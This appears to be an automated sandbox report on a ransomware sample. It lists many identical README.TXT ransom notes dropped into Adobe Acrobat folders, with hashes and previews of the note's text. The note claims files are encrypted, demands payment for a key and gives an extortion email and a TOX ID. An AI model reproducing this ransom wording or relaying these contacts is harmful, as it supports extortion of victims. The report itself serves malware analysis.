                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\uk-ua\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\de-de\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\en-us\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\fr-fr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\ja-jp\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\pt-br\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ar-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ca-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\cs-cz\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\en-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
